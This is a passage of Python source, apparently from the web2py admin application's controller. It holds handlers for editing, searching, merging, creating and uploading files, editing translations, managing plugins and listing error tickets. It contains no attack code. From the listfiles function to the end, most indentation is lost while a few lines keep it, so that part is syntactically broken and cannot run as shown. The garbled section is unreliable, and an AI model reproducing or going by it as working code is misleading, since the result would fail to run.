        apath('%s/controllers/' % app, r=request), file + '$')
    return dict(app=app, controllers=controllers)

def keepalive():
    return ''

def search():
    keywords = request.vars.keywords or ''
    app = get_app()

    def match(filename, keywords):
        filename = os.path.join(apath(app, r=request), filename)
        if keywords in read_file(filename, 'rb'):
            return True
        return False

    path = apath(request.args[0], r=request)
    files1 = glob(os.path.join(path, '*/*.py'))
    files2 = glob(os.path.join(path, '*/*.html'))
    files3 = glob(os.path.join(path, '*/*/*.html'))
    files = [x[len(path) + 1:].replace(
        '\\', '/') for x in files1 + files2 + files3 if match(x, keywords)]
    return response.json(dict(files=files, message=T.M('Searching: **%s** %%{file}', len(files))))

def edit():
    """ File edit handler """
    # Load json only if it is ajax edited...
    app = get_app(request.vars.app)
    app_path = apath(app, r=request)
    preferences = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
    config = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor', default_values={})
    preferences.update(config.read())

    if not(request.ajax) and not(is_mobile):
        # return the scaffolding, the rest will be through ajax requests
        response.title = T('Editing %s') % app
        return response.render('default/edit.html', dict(app=app, editor_settings=preferences))

    # show settings tab and save prefernces
    if 'settings' in request.vars:
        if request.post_vars:  # save new preferences
            if PY2:
                post_vars = request.post_vars.items()
            else:
                post_vars = list(request.post_vars.items())
            # Since unchecked checkbox are not serialized, we must set them as false by hand to store the correct preference in the settings
            post_vars += [(opt, 'false') for opt in preferences if opt not in request.post_vars]
            if config.save(post_vars):
                response.headers["web2py-component-flash"] = T('Preferences saved correctly')
            else:
                response.headers["web2py-component-flash"] = T('Preferences saved on session only')
            response.headers["web2py-component-command"] = "update_editor(%s);$('a[href=#editor_settings] button.close').click();" % response.json(config.read())
            return
        else:
            details = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
            details['plain_html'] = response.render('default/editor_settings.html', {'editor_settings': preferences})
            return response.json(details)

    """ File edit handler """
    # Load json only if it is ajax edited...
    app = get_app(request.vars.app)
    filename = '/'.join(request.args)
    realfilename = request.args[-1]
    if request.vars.app:
        path = abspath(filename)
    else:
        path = apath(filename, r=request)
    # Try to discover the file type
    if filename[-3:] == '.py':
        filetype = 'python'
    elif filename[-5:] == '.html':
        filetype = 'html'
    elif filename[-5:] == '.load':
        filetype = 'html'
    elif filename[-4:] == '.css':
        filetype = 'css'
    elif filename[-3:] == '.js':
        filetype = 'javascript'
    else:
        filetype = 'html'

    # ## check if file is not there
    if ('revert' in request.vars) and os.path.exists(path + '.bak'):
        try:
            data = safe_read(path + '.bak')
            data1 = safe_read(path)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        safe_write(path, data)
        file_hash = md5_hash(data)
        saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
        safe_write(path + '.bak', data1)
        response.flash = T('file "%s" of %s restored', (filename, saved_on))
    else:
        try:
            data = safe_read(path)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        lineno_old = count_lines(data)
        file_hash = md5_hash(data)
        saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
        if request.vars.file_hash and request.vars.file_hash != file_hash:
            session.flash = T('file changed on disk')
            data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
            safe_write(path + '.1', data)
            if 'from_ajax' in request.vars:
                return response.json({'error': str(T('file changed on disk')),
                                      'redirect': URL('resolve',
                                                      args=request.args)})
            else:
                redirect(URL('resolve', args=request.args))
        elif request.vars.data:
            safe_write(path + '.bak', data)
            data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
            safe_write(path, data)
            lineno_new = count_lines(data)
            log_progress(
                app, 'EDIT', filename, progress=lineno_new - lineno_old)
            file_hash = md5_hash(data)
            saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
            response.flash = T('file saved on %s', saved_on)
    data_or_revert = (request.vars.data or request.vars.revert)

    # Check compile errors
    highlight = None
    if filetype == 'python' and request.vars.data:
        import _ast
        try:
            code = request.vars.data.rstrip().replace('\r\n', '\n') + '\n'
            compile(code, path, "exec", _ast.PyCF_ONLY_AST)
        except Exception as e:
            # offset calculation is only used for textarea (start/stop)
            start = sum([len(line) + 1 for l, line
                         in enumerate(request.vars.data.split("\n"))
                         if l < e.lineno - 1])
            if e.text and e.offset:
                offset = e.offset - (len(e.text) - len(
                    e.text.splitlines()[-1]))
            else:
                offset = 0
            highlight = {'start': start, 'end': start +
                         offset + 1, 'lineno': e.lineno, 'offset': offset}
            try:
                ex_name = e.__class__.__name__
            except:
                ex_name = 'unknown exception!'
            response.flash = DIV(T('failed to compile file because:'), BR(),
                                 B(ex_name), ' ' + T('at line %s', e.lineno),
                                 offset and ' ' +
                                 T('at char %s', offset) or '',
                                 PRE(repr(e)))

    if data_or_revert and request.args[1] == 'modules':
        # Lets try to reload the modules
        try:
            mopath = '.'.join(request.args[2:])[:-3]
            exec('import applications.%s.modules.%s' % (
                request.args[0], mopath))
            reload(sys.modules['applications.%s.modules.%s'
                               % (request.args[0], mopath)])
        except Exception as e:
            response.flash = DIV(
                T('failed to reload module because:'), PRE(repr(e)))

    edit_controller = None
    editviewlinks = None
    view_link = None
    if filetype == 'html' and len(request.args) >= 3:
        cfilename = os.path.join(request.args[0], 'controllers',
                                 request.args[2] + '.py')
        if os.path.exists(apath(cfilename, r=request)):
            edit_controller = URL('edit', args=[cfilename.replace(os.sep, "/")])
            view = request.args[3].replace('.html', '')
            view_link = URL(request.args[0], request.args[2], view)
    elif filetype == 'python' and request.args[1] == 'controllers':
        # it's a controller file.
        # Create links to all of the associated view files.
        app = get_app()
        viewname = os.path.splitext(request.args[2])[0]
        viewpath = os.path.join(app, 'views', viewname)
        aviewpath = apath(viewpath, r=request)
        viewlist = []
        if os.path.exists(aviewpath):
            if os.path.isdir(aviewpath):
                viewlist = glob(os.path.join(aviewpath, '*.html'))
        elif os.path.exists(aviewpath + '.html'):
            viewlist.append(aviewpath + '.html')
        if len(viewlist):
            editviewlinks = []
            for v in sorted(viewlist):
                vf = os.path.split(v)[-1]
                vargs = "/".join([viewpath.replace(os.sep, "/"), vf])
                editviewlinks.append(A(vf.split(".")[0],
                                       _class="editor_filelink",
                                       _href=URL('edit', args=[vargs])))

    if len(request.args) > 2 and request.args[1] == 'controllers':
        controller = (request.args[2])[:-3]
        functions = find_exposed_functions(data)
        functions = functions and sorted(functions) or []
    else:
        (controller, functions) = (None, None)

    if 'from_ajax' in request.vars:
        return response.json({'file_hash': file_hash, 'saved_on': saved_on, 'functions': functions, 'controller': controller, 'application': request.args[0], 'highlight': highlight})
    else:
        file_details = dict(app=request.args[0],
                            lineno=request.vars.lineno or 1,
                            editor_settings=preferences,
                            filename=filename,
                            realfilename=realfilename,
                            filetype=filetype,
                            data=data,
                            edit_controller=edit_controller,
                            file_hash=file_hash,
                            saved_on=saved_on,
                            controller=controller,
                            functions=functions,
                            view_link=view_link,
                            editviewlinks=editviewlinks,
                            id=IS_SLUG()(filename)[0],
                            force=True if (request.vars.restore or
                                           request.vars.revert) else False)
        plain_html = response.render('default/edit_js.html', file_details)
        file_details['plain_html'] = plain_html
        if is_mobile:
            return response.render('default.mobile/edit.html',
                                   file_details, editor_settings=preferences)
        else:
            return response.json(file_details)

def todolist():
    """ Returns all TODO of the requested app
    """
    app = request.vars.app or ''
    app_path = apath('%(app)s' % {'app': app}, r=request)
    dirs = ['models', 'controllers', 'modules', 'private']

    def listfiles(app, dir, regexp='.*\.py$'):
        files = sorted(listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
        files = [x.replace(os.path.sep, '/') for x in files if not x.endswith('.bak')]
        return files

    pattern = '#\s*(todo)+\s+(.*)'
    regex = re.compile(pattern, re.IGNORECASE)
    output = []
    for d in dirs:
        for f in listfiles(app, d):
            matches = []
            filename = apath(os.path.join(app, d, f), r=request)
            with safe_open(filename, 'r') as f_s:
                src = f_s.read()
            for m in regex.finditer(src):
                start = m.start()
                lineno = src.count('\n', 0, start) + 1
                matches.append({'text': m.group(0), 'lineno': lineno})
            if len(matches) != 0:
                output.append({'filename': f, 'matches': matches, 'dir': d})
    return {'todo': output, 'app': app}

def editor_sessions():
    config = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor_sessions', default_values={})
    preferences = config.read()
    if request.vars.session_name and request.vars.files:
        session_name = request.vars.session_name
        files = request.vars.files
        preferences.update({session_name: ','.join(files)})
        if config.save(preferences.items()):
            response.headers["web2py-component-flash"] = T('Session saved correctly')
        else:
            response.headers["web2py-component-flash"] = T('Session saved on session only')
    return response.render('default/editor_sessions.html', {'editor_sessions': preferences})

def resolve():
    """
    """
    filename = '/'.join(request.args)
    # ## check if file is not there
    path = apath(filename, r=request)
    a = safe_read(path).split('\n')
    try:
        b = safe_read(path + '.1').split('\n')
    except IOError:
        session.flash = 'Other file, no longer there'
        redirect(URL('edit', args=request.args))
    d = difflib.ndiff(a, b)

    def leading(line):
        """ """
        # TODO: we really need to comment this
        z = ''
        for (k, c) in enumerate(line):
            if c == ' ':
                z += '&nbsp;'
            elif c == ' \t':
                z += '&nbsp;'
            elif k == 0 and c == '?':
                pass
            else:
                break
        return XML(z)

    def getclass(item):
        """ Determine item class """
        operators = {' ': 'normal', '+': 'plus', '-': 'minus'}
        return operators[item[0]]

    if request.vars:
        c = '\n'.join([item[2:].rstrip() for (i, item) in enumerate(d) if item[0]
                       == ' ' or 'line%i' % i in request.vars])
        safe_write(path, c)
        session.flash = 'files merged'
        redirect(URL('edit', args=request.args))
    else:
        # Making the short circuit compatible with <= python2.4
        gen_data = lambda index, item: not item[:1] in ['+', '-'] and "" \
            or INPUT(_type='checkbox',
                     _name='line%i' % index,
                     value=item[0] == '+')
        diff = TABLE(*[TR(TD(gen_data(i, item)),
                          TD(item[0]),
                          TD(leading(item[2:]),
                             TT(item[2:].rstrip())),
                          _class=getclass(item))
                       for (i, item) in enumerate(d) if item[0] != '?'])
    return dict(diff=diff, filename=filename)

def edit_language():
    """ Edit language file """
    app = get_app()
    filename = '/'.join(request.args)
    response.title = request.args[-1]
    strings = read_dict(apath(filename, r=request))

    if '__corrupted__' in strings:
        form = SPAN(strings['__corrupted__'], _class='error')
        return dict(filename=filename, form=form)

    keys = sorted(strings.keys(), key=lambda x: to_native(x).lower())
    rows = []
    rows.append(H2(T('Original/Translation')))

    for key in keys:
        name = md5_hash(key)
        s = strings[key]
        (prefix, sep, key) = key.partition('\x01')
        if sep:
            prefix = SPAN(prefix + ': ', _class='tm_ftag')
            k = key
        else:
            (k, prefix) = (prefix, '')

        _class = 'untranslated' if k == s else 'translated'

        if len(s) <= 40:
            elem = INPUT(_type='text', _name=name, value=s,
                         _size=70, _class=_class)
        else:
            elem = TEXTAREA(_name=name, value=s, _cols=70,
                            _rows=5, _class=_class)

        # Making the short circuit compatible with <= python2.4
        k = (s != k) and k or B(k)

        new_row = DIV(LABEL(prefix, k, _style="font-weight:normal;"),
                      CAT(elem, '\n', TAG.BUTTON(
                          T('delete'),
                          _onclick='return delkey("%s")' % name,
                          _class='btn')), _id=name, _class='span6 well well-small')

        rows.append(DIV(new_row, _class="row-fluid"))

    rows.append(DIV(INPUT(_type='submit', _value=T('update'), _class="btn btn-primary"), _class='controls'))
    form = FORM(*rows)
    if form.accepts(request.vars, keepvalues=True):
        strs = dict()
        for key in keys:
            name = md5_hash(key)
            if form.vars[name] == chr(127):
                continue
            strs[key] = form.vars[name]
        write_dict(apath(filename, r=request), strs)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(r=request, args=request.args))
    return dict(app=request.args[0], filename=filename, form=form)

def edit_plurals():
    """ Edit plurals file """
    app = get_app()
    filename = '/'.join(request.args)
    plurals = read_plural_dict(
        apath(filename, r=request))  # plural forms dictionary
    nplurals = int(request.vars.nplurals) - 1  # plural forms quantity
    xnplurals = xrange(nplurals)

    if '__corrupted__' in plurals:
        # show error message and exit
        form = SPAN(plurals['__corrupted__'], _class='error')
        return dict(filename=filename, form=form)

    keys = sorted(plurals.keys(), lambda x, y: cmp(
        unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
    tab_rows = []
    for key in keys:
        name = md5_hash(key)
        forms = plurals[key]

        if len(forms) < nplurals:
            forms.extend(None for i in xrange(nplurals - len(forms)))
        tab_col1 = DIV(CAT(LABEL(T("Singular Form")), B(key,
                                                        _class='fake-input')))
        tab_inputs = [SPAN(LABEL(T("Plural Form #%s", n + 1)), INPUT(_type='text', _name=name + '_' + str(n), value=forms[n], _size=20), _class='span6') for n in xnplurals]
        tab_col2 = DIV(CAT(*tab_inputs))
        tab_col3 = DIV(CAT(LABEL(XML('&nbsp;')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % name, _class='btn'), _class='span6'))
        tab_row = DIV(DIV(tab_col1, '\n', tab_col2, '\n', tab_col3, _class='well well-small'), _id=name, _class='row-fluid tab_row')
        tab_rows.append(tab_row)

    tab_rows.append(DIV(TAG['button'](T('update'), _type='submit',
                                      _class='btn btn-primary'),
                        _class='controls'))
    tab_container = DIV(*tab_rows, **dict(_class="row-fluid"))

    form = FORM(tab_container)
    if form.accepts(request.vars, keepvalues=True):
        new_plurals = dict()
        for key in keys:
            name = md5_hash(key)
            if form.vars[name + '_0'] == chr(127):
                continue
            new_plurals[key] = [form.vars[name + '_' + str(n)]
                                for n in xnplurals]
        write_plural_dict(apath(filename, r=request), new_plurals)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(r=request, args=request.args, vars=dict(
            nplurals=request.vars.nplurals)))
    return dict(app=request.args[0], filename=filename, form=form)

def about():
    """ Read about info """
    app = get_app()
    # ## check if file is not there
    about = safe_read(apath('%s/ABOUT' % app, r=request))
    license = safe_read(apath('%s/LICENSE' % app, r=request))
    return dict(app=app, about=MARKMIN(about), license=MARKMIN(license), progress=report_progress(app))

def design():
    """ Application design handler """
    app = get_app()
    if not response.flash and app == request.application:
        msg = T('ATTENTION: you cannot edit the running application!')
        response.flash = msg
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
        filename = os.path.basename(request.vars.pluginfile.filename)
        if plugin_install(app, request.vars.pluginfile.file,
                          request, filename):
            session.flash = T('new plugin installed')
            redirect(URL('design', args=app))
        else:
            session.flash = \
                T('unable to install plugin "%s"', filename)
        redirect(URL(r=request, args=app))
    elif isinstance(request.vars.pluginfile, str):
        session.flash = T('plugin not specified')
        redirect(URL(r=request, args=app))

    # If we have only pyc files it means that
    # we cannot design
    if os.path.exists(apath('%s/compiled' % app, r=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))

    # Get all models
    models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
    models = [x.replace('\\', '/') for x in models]
    defines = {}
    for m in models:
        data = safe_read(apath('%s/models/%s' % (app, m), r=request))
        defines[m] = regex_tables.findall(data)
        defines[m].sort()

    # Get all controllers
    controllers = sorted(
        listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
    controllers = [x.replace('\\', '/') for x in controllers]
    functions = {}
    for c in controllers:
        data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
        items = find_exposed_functions(data)
        functions[c] = items and sorted(items) or []

    # Get all views
    views = sorted(
        listdir(apath('%s/views/' % app, r=request), '[\w/\-]+(\.\w+)+$'))
    views = [x.replace('\\', '/') for x in views if not x.endswith('.bak')]
    extend = {}
    include = {}
    for c in views:
        data = safe_read(apath('%s/views/%s' % (app, c), r=request))
        items = regex_extend.findall(data)
        if items:
            extend[c] = items[0][1]
        items = regex_include.findall(data)
        include[c] = [i[1] for i in items]

    # Get all modules
    modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
    modules = [x.replace('\\', '/') for x in modules]
    modules.sort()

    # Get all private files
    privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
    privates = [x.replace('\\', '/') for x in privates]
    privates.sort()

    # Get all static files
    statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
                      maxnum=MAXNFILES)
    statics = [x.replace(os.path.sep, '/') for x in statics]
    statics.sort()

    # Get all languages
    langpath = os.path.join(apath(app, r=request), 'languages')
    languages = dict([(lang, info) for lang, info
                      in iteritems(read_possible_languages(langpath))
                      if info[2] != 0])  # info[2] is langfile_mtime:
    # get only existed files

    # Get crontab
    cronfolder = apath('%s/cron' % app, r=request)
    crontab = apath('%s/cron/crontab' % app, r=request)
    if not is_gae:
        if not os.path.exists(cronfolder):
            os.mkdir(cronfolder)
        if not os.path.exists(crontab):
            safe_write(crontab, '#crontab')

    plugins = []

    def filter_plugins(items, plugins):
        plugins += [item[7:].split('/')[0].split(
            '.')[0] for item in items if item.startswith('plugin_')]
        plugins[:] = list(set(plugins))
        plugins.sort()
        return [item for item in items if not item.startswith('plugin_')]

    return dict(app=app,
                models=filter_plugins(models, plugins),
                defines=defines,
                controllers=filter_plugins(controllers, plugins),
                functions=functions,
                views=filter_plugins(views, plugins),
                modules=filter_plugins(modules, plugins),
                extend=extend,
                include=include,
                privates=filter_plugins(privates, plugins),
                statics=filter_plugins(statics, plugins),
                languages=languages,
                crontab=crontab,
                plugins=plugins)

def delete_plugin():
    """ Object delete handler """
    app = request.args(0)
    plugin = request.args(1)
    plugin_name = 'plugin_' + plugin
    dialog = FORM.confirm(
        T('Delete'),
        {T('Cancel'): URL('design', args=app)})
    if dialog.accepted:
        try:
            for folder in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
                path = os.path.join(apath(app, r=request), folder)
                for item in os.listdir(path):
                    if item.rsplit('.', 1)[0] == plugin_name:
                        filename = os.path.join(path, item)
                        if os.path.isdir(filename):
                            shutil.rmtree(filename)
                        else:
                            os.unlink(filename)
            session.flash = T('plugin "%(plugin)s" deleted',
                              dict(plugin=plugin))
        except Exception:
            session.flash = T('unable to delete file plugin "%(plugin)s"',
                              dict(plugin=plugin))
        redirect(URL('design', args=request.args(0), anchor=request.vars.id2))
    return dict(dialog=dialog, plugin=plugin)

def plugin():
    """ Application design handler """
    app = get_app()
    plugin = request.args(1)
    if not response.flash and app == request.application:
        msg = T('ATTENTION: you cannot edit the running application!')
        response.flash = msg

    # If we have only pyc files it means that
    # we cannot design
    if os.path.exists(apath('%s/compiled' % app, r=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))

    # Get all models
    models = listdir(apath('%s/models/' % app, r=request), '.*\.py$')
    models = [x.replace('\\', '/') for x in models]
    defines = {}
    for m in models:
        data = safe_read(apath('%s/models/%s' % (app, m), r=request))
        defines[m] = regex_tables.findall(data)
        defines[m].sort()

    # Get all controllers
    controllers = sorted(
        listdir(apath('%s/controllers/' % app, r=request), '.*\.py$'))
    controllers = [x.replace('\\', '/') for x in controllers]
    functions = {}
    for c in controllers:
        data = safe_read(apath('%s/controllers/%s' % (app, c), r=request))
        items = find_exposed_functions(data)
        functions[c] = items and sorted(items) or []

    # Get all views
    views = sorted(
        listdir(apath('%s/views/' % app, r=request), '[\w/\-]+\.\w+$'))
    views = [x.replace('\\', '/') for x in views]
    extend = {}
    include = {}
    for c in views:
        data = safe_read(apath('%s/views/%s' % (app, c), r=request))
        items = regex_extend.findall(data)
        if items:
            extend[c] = items[0][1]
        items = regex_include.findall(data)
        include[c] = [i[1] for i in items]

    # Get all modules
    modules = listdir(apath('%s/modules/' % app, r=request), '.*\.py$')
    modules = [x.replace('\\', '/') for x in modules]
    modules.sort()

    # Get all private files
    privates = listdir(apath('%s/private/' % app, r=request), '[^\.#].*')
    privates = [x.replace('\\', '/') for x in privates]
    privates.sort()

    # Get all static files
    statics = listdir(apath('%s/static/' % app, r=request), '[^\.#].*',
                      maxnum=MAXNFILES)
    statics = [x.replace(os.path.sep, '/') for x in statics]
    statics.sort()

    # Get all languages
    languages = sorted([lang + '.py' for lang, info in
                        iteritems(T.get_possible_languages_info())
                        if info[2] != 0])  # info[2] is langfile_mtime:
    # get only existed files

    # Get crontab
    crontab = apath('%s/cron/crontab' % app, r=request)
    if not os.path.exists(crontab):
        safe_write(crontab, '#crontab')

    def filter_plugins(items):
        regex = re.compile('^plugin_' + plugin + '(/.*|\..*)?$')
        return [item for item in items if item and regex.match(item)]

    return dict(app=app,
                models=filter_plugins(models),
                defines=defines,
                controllers=filter_plugins(controllers),
                functions=functions,
                views=filter_plugins(views),
                modules=filter_plugins(modules),
                extend=extend,
                include=include,
                privates=filter_plugins(privates),
                statics=filter_plugins(statics),
                languages=languages,
                crontab=crontab)

def create_file():
    """ Create files handler """
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        anchor = '#' + request.vars.id if request.vars.id else ''
        if request.vars.app:
            app = get_app(request.vars.app)
            path = abspath(request.vars.location)
        else:
            if request.vars.dir:
                request.vars.location += request.vars.dir + '/'
            app = get_app(name=request.vars.location.split('/')[0])
            path = apath(request.vars.location, r=request)
        filename = re.sub('[^\w./-]+', '_', request.vars.filename)
        if path[-7:] == '/rules/':
            # Handle plural rules files
            if len(filename) == 0:
                raise SyntaxError
            if not filename[-3:] == '.py':
                filename += '.py'
            lang = re.match('^plural_rules-(.*)\.py$', filename).group(1)
            langinfo = read_possible_languages(apath(app, r=request))[lang]
            text = dedent("""
                #!/usr/bin/env python
                # -*- coding: utf-8 -*-
                # Plural-Forms for %(lang)s (%(langname)s)

                nplurals=2  # for example, English language has 2 forms:
                            # 1 singular and 1 plural

                # Determine plural_id for number *n* as sequence of positive
                # integers: 0,1,...
                # NOTE! For singular form ALWAYS return plural_id = 0
                get_plural_id = lambda n: int(n != 1)

                # Construct and return plural form of *word* using
                # *plural_id* (which ALWAYS>0). This function will be executed
                # for words (or phrases) not found in plural_dict dictionary.
                # By default this function simply returns word in singular:
                construct_plural_form = lambda word, plural_id: word
                """)[1:] % dict(lang=langinfo[0], langname=langinfo[1])
        elif path[-11:] == '/languages/':
            # Handle language files
            if len(filename) == 0:
                raise SyntaxError
            if not filename[-3:] == '.py':
                filename += '.py'
            path = os.path.join(apath(app, r=request), 'languages', filename)
            if not os.path.exists(path):
                safe_write(path, '')
            # create language xx[-yy].py file:
            findT(apath(app, r=request), filename[:-3])
            session.flash = T('language file "%(filename)s" created/updated',
                              dict(filename=filename))
            redirect(request.vars.sender + anchor)
        elif path[-8:] == '/models/':
            # Handle python models
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = '# -*- coding: utf-8 -*-\n'
        elif path[-13:] == '/controllers/':
            # Handle python controllers
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = '# -*- coding: utf-8 -*-\n# %s\ndef index(): return dict(message="hello from %s")'
            text = text % (T('try something like'), filename)
        elif path[-7:] == '/views/':
            if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            # Handle template (html) views
            if filename.find('.') < 0:
                filename += '.html'
            extension = filename.split('.')[-1].lower()
            if len(filename) == 5:
                raise SyntaxError
            msg = T(
                'This is the %(filename)s template', dict(filename=filename))
            if extension == 'html':
                text = dedent("""
                    {{extend 'layout.html'}}
                    <h1>%s</h1>
                    {{=BEAUTIFY(response._vars)}}""" % msg)[1:]
            else:
                generic = os.path.join(path, 'generic.' + extension)
                if os.path.exists(generic):
                    text = read_file(generic)
                else:
                    text = ''
        elif path[-9:] == '/modules/':
            if request.vars.plugin and not filename.startswith('plugin_%s/' % request.vars.plugin):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            # Handle python module files
            if not filename[-3:] == '.py':
                filename += '.py'
            if len(filename) == 3:
                raise SyntaxError
            text = dedent("""
                #!/usr/bin/env python
                # -*- coding: utf-8 -*-
                from gluon import *\n""")[1:]
        elif (path[-8:] == '/static/') or (path[-9:] == '/private/'):
            if (request.vars.plugin and
                    not filename.startswith('plugin_%s/' % request.vars.plugin)):
                filename = 'plugin_%s/%s' % (request.vars.plugin, filename)
            text = ''
        else:
            redirect(request.vars.sender + anchor)
        full_filename = os.path.join(path, filename)
        dirpath = os.path.dirname(full_filename)
        if not os.path.exists(dirpath):
            os.makedirs(dirpath)
        if os.path.exists(full_filename):
            raise SyntaxError
        safe_write(full_filename, text)
        log_progress(app, 'CREATE', filename)
        if request.vars.dir:
            result = T('file "%(filename)s" created',
                       dict(filename=full_filename[len(path):]))
        else:
            session.flash = T('file "%(filename)s" created',
                              dict(filename=full_filename[len(path):]))
        vars = {}
        if request.vars.id:
            vars['id'] = request.vars.id
        if request.vars.app:
            vars['app'] = request.vars.app
        redirect(URL('edit',
                     args=[os.path.join(request.vars.location, filename)], vars=vars))
    except Exception as e:
        if not isinstance(e, HTTP):
            session.flash = T('cannot create file')

    if request.vars.dir:
        response.flash = result
        response.headers['web2py-component-content'] = 'append'
        response.headers['web2py-component-command'] = "%s %s %s" % (
            "$.web2py.invalidate('#files_menu');",
            "load_file('%s');" % URL('edit', args=[app, request.vars.dir, filename]),
            "$.web2py.enableElement($('#form form').find($.web2py.formInputClickSelector));")
        return ''
    else:
        redirect(request.vars.sender + anchor)
def listfiles(app, dir, regexp=r'.*\.py$'):
files = sorted(
listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
files = [x.replace('\\', '/') for x in files if not x.endswith('.bak')]
return files
def editfile(path, file, vars={}, app=None):
args = (path, file) if 'app' in vars else (app, path, file)
url = URL('edit', args=args, vars=vars)
return A(file, _class='editor_filelink', _href=url, _style='word-wrap: nowrap;')
def files_menu():
app = request.vars.app or 'welcome'
    dirs = [{'name': 'models', 'reg': r'.*\.py$'},
            {'name': 'controllers', 'reg': r'.*\.py$'},
            {'name': 'views', 'reg': r'[\w/\-]+(\.\w+)+$'},
            {'name': 'modules', 'reg': r'.*\.py$'},
            {'name': 'static', 'reg': r'[^\.#].*'},
            {'name': 'private', 'reg': r'.*\.py$'}]
result_files = []
for dir in dirs:
result_files.append(TAG[''](LI(dir['name'], _class="nav-header component", _onclick="collapse('" + dir['name'] + "_files');"),
LI(UL(*[LI(editfile(dir['name'], f, dict(id=dir['name'] + f.replace('.', '__')), app), _style="overflow:hidden", _id=dir['name'] + "__" + f.replace('.', '__'))
for f in listfiles(app, dir['name'], regexp=dir['reg'])],
_class="nav nav-list small-font"),
_id=dir['name'] + '_files', _style="display: none;")))
return dict(result_files=result_files)
def upload_file():
""" File uploading handler """
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
try:
filename = None
app = get_app(name=request.vars.location.split('/')[0])
path = apath(request.vars.location, r=request)
if request.vars.filename:
            filename = re.sub(r'[^\w\./]+', '_', request.vars.filename)
else:
filename = os.path.split(request.vars.file.filename)[-1]
if path[-8:] == '/models/' and not filename[-3:] == '.py':
filename += '.py'
if path[-9:] == '/modules/' and not filename[-3:] == '.py':
filename += '.py'
if path[-13:] == '/controllers/' and not filename[-3:] == '.py':
filename += '.py'
if path[-7:] == '/views/' and not filename[-5:] == '.html':
filename += '.html'
if path[-11:] == '/languages/' and not filename[-3:] == '.py':
filename += '.py'
filename = os.path.join(path, filename)
dirpath = os.path.dirname(filename)
if not os.path.exists(dirpath):
os.makedirs(dirpath)
data = request.vars.file.file.read()
lineno = count_lines(data)
safe_write(filename, data, 'wb')
log_progress(app, 'UPLOAD', filename, lineno)
session.flash = T('file "%(filename)s" uploaded',
dict(filename=filename[len(path):]))
except Exception:
if filename:
d = dict(filename=filename[len(path):])
else:
d = dict(filename='unknown')
session.flash = T('cannot upload file "%(filename)s"', d)
redirect(request.vars.sender)
def errors():
""" Error handler """
import operator
import os
import hashlib
app = get_app()
if is_gae:
method = 'dbold' if ('old' in
(request.args(1) or '')) else 'dbnew'
else:
method = request.args(1) or 'new'
db_ready = {}
db_ready['status'] = get_ticket_storage(app)
db_ready['errmessage'] = T(
"No ticket_storage.txt found under /private folder")
db_ready['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
if method == 'new':
errors_path = apath('%s/errors' % app, r=request)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
        for fn in listdir(errors_path, r'^[a-fA-F0-9.\-]+$'):
fullpath = os.path.join(errors_path, fn)
if not os.path.isfile(fullpath):
continue
try:
fullpath_file = safe_open(fullpath, 'rb')
try:
error = pickle.load(fullpath_file)
finally:
fullpath_file.close()
except IOError:
continue
except EOFError:
continue
hash = hashlib.md5(to_bytes(error['traceback'])).hexdigest()
if hash in delete_hashes:
os.unlink(fullpath)
else:
try:
hash2error[hash]['count'] += 1
except KeyError:
error_lines = error['traceback'].split("\n")
last_line = error_lines[-2] if len(error_lines) > 1 else 'unknown'
error_causer = os.path.split(error['layer'])[1]
hash2error[hash] = dict(count=1, pickel=error,
causer=error_causer,
last_line=last_line,
hash=hash, ticket=fn)
decorated = [(x['count'], x) for x in hash2error.values()]
decorated.sort(key=operator.itemgetter(0), reverse=True)
return dict(errors=[x[1] for x in decorated], app=app, method=method, db_ready=db_ready)
elif method == 'dbnew':
errors_path = apath('%s/errors' % app, r=request)
tk_db, tk_table = get_ticket_storage(app)
delete_hashes = []
for item in request.vars:
if item[:7] == 'delete_':
delete_hashes.append(item[7:])
hash2error = dict()
for fn in tk_db(tk_table.id > 0).select():
try:
error = pickle.loads(fn.ticket_data)
hash = hashlib.md5(error['traceback']).hexdigest()
if hash in delete_hashes:
